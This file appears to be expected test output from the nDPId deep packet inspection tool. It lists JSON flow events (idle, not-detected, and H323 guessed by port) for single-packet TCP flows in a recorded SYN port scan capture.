+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":881,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":924,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9900,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":924,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5810,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5810,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":708,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5810,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":708,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5810,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5811,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5811,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5811,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5811,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1717,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1717,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":953,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":18101,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":953,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":18101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1002,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":18101,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1002,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":18101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1717,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1717,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":872,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3766,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":872,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3766,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":721,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1718,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":721,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5815,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5815,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":933,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3766,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":933,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3766,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1718,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1719,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"H323","breed":"Acceptable","category":"VoIP"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1719,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5815,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5815,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1719,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"H323","breed":"Acceptable","category":"VoIP"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1719,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1720,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"H323","breed":"Acceptable","category":"VoIP"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1721,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1720,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"H323","breed":"Acceptable","category":"VoIP"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1721,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 